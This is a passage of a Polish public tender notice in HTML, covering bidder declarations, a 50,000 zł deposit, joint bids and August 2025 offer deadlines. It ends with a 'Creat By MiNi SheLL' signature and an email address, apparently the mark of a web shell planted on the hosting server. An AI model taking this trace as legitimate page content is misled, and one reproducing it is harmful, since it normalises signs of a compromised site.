instalacyjnej w zakresie instalacji i urządzeń elektrycznych których zakres uprawnia go do kierowania robotami objętymi przedmiotem zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Wykonawca zobowiązany jest złożyć wraz z ofertą oświadczenia stanowiące wstępne potwierdzenie, że Wykonawca na dzień składania ofert:<br/>a) nie podlega wykluczeniu,<br/>b) spełnia warunki udziału w postępowaniu.<br/>Oświadczenia należy złożyć wg wymogów załącznika nr 3 i 4 do SWZ.<br/>Zamawiający nie żąda złożenia przez Wykonawcę dokumentów na potwierdzenie braku podstaw do wykluczenia z udziału w postępowaniu.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Wykonawca zobowiązany jest złożyć wraz z ofertą oświadczenia stanowiące wstępne potwierdzenie, że Wykonawca na dzień składania ofert:<br/>a) nie podlega wykluczeniu,<br/>b) spełnia warunki udziału w postępowaniu.<br/>Oświadczenia należy złożyć wg wymogów załącznika nr 3 i 4 do SWZ.<br/>Jeżeli wykonawca nie złożył oświadczeń, o którym mowa w pkt 8.1 SWZ lub są one niekompletne lub zawierają błędy, zamawiający wezwie wykonawcę odpowiednio do ich złożenia, poprawienia lub uzupełnienia w wyznaczonym terminie, chyba że oferta wykonawcy podlega odrzuceniu bez względu na ich złożenie, uzupełnienie lub poprawienie lub zachodzą przesłanki unieważnienia postępowania.<br/>Zamawiający wezwie wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie (nie krótszym niż 5 dni od dnia wezwania) następujących podmiotowych środków dowodowych (aktualnych na dzień złożenia):<br/> a) wykazu robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane (sporządzonego zgodnie z Załącznikiem Nr 6 do SWZ), z załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - inne odpowiednie dokumenty – w odniesieniu do warunku określonego w pkt. 6.1.4.1) SWZ <br/>b) wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia, w szczególności odpowiedzialnych za świadczenie usług wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami, sporządzonego zgodnie z Załącznikiem Nr 7 do SWZ – w odniesieniu do warunku określonego w pkt. 6.1.4.2. SWZ.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Przystępując do niniejszego postępowania każdy Wykonawca zobowiązany jest wnieść wadium w wysokości 50 000,00 zł (słownie: pięćdziesiąt tysięcy złotych 00/100).<br/>Wykonawca zobowiązany jest wnieść wadium przed upływem terminu składania ofert.<br/>Wadium może być wnoszone w: <br/>a)	pieniądzu, przelewem na konto Zamawiającego: Bank Spółdzielczy w Mszczonowie, nr 24 9302 1027 2601 6447 2000 0050 (w tym przypadku Wykonawca winien dodatkowo dołączyć dokument potwierdzający wniesienie wadium) <br/>b)	gwarancjach bankowych, <br/>c)	gwarancjach ubezpieczeniowych, <br/>d)	poręczeniach udzielanych przez podmioty o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2025r. poz. 98).<br/>Wadium wnoszone w poręczeniach lub gwarancjach należy załączyć do oferty w oryginale w postaci dokumentu elektronicznego podpisanego kwalifikowanym podpisem elektronicznym przez wystawcę dokumentu.<br/>Za termin wniesienia wadium w formie pieniądza przyjmuje się termin uznania na rachunku Zamawiającego. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku, wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia:<br/>a) oświadczenia o których mowa w pkt. 8.1 SWZ składa z ofertą każdy z Wykonawców wspólnie ubiegających się o zamówienie. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu lub kryteria selekcji.<br/>b) w przypadku, o którym mowa w rozdziale 6.3 SWZ wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni wykonawcy. W przypadku gdy ofertę składa spółka cywilna, a pełen zakres prac wykonają wspólnicy wspólnie w ramach umowy spółki oświadczenie powinno potwierdzać ten fakt. Oświadczenie należy złożyć wg wymogów załącznika nr 5 do SWZ. Oświadczenie to jest podmiotowym środkiem dowodowym.<br/>c) zobowiązani są oni na wezwanie Zamawiającego, złożyć podmiotowe środki dowodowe, o których mowa w pkt. 8.3 SWZ, przy czym podmiotowe środki dowodowe, o których mowa:<br/>- w pkt. 8.3.1 SWZ składa odpowiednio Wykonawca/Wykonawcy, który/którzy wykazuje/-ą spełnienie warunku<br/>Jeżeli została wybrana oferta wykonawców wspólnie ubiegających się o udzielenie zamówienia, zamawiający może żądać przed zawarciem umowy w sprawie zamówienia publicznego kopii umowy regulującej współpracę tych wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwości wprowadzenia zmian do zawartej umowy, na podstawie art. 454-455 ustawy oraz postanowień Projektu Umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-08-08 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem Portalu e-Zamówienia pod adresem internetowym: https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-08-08 13:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com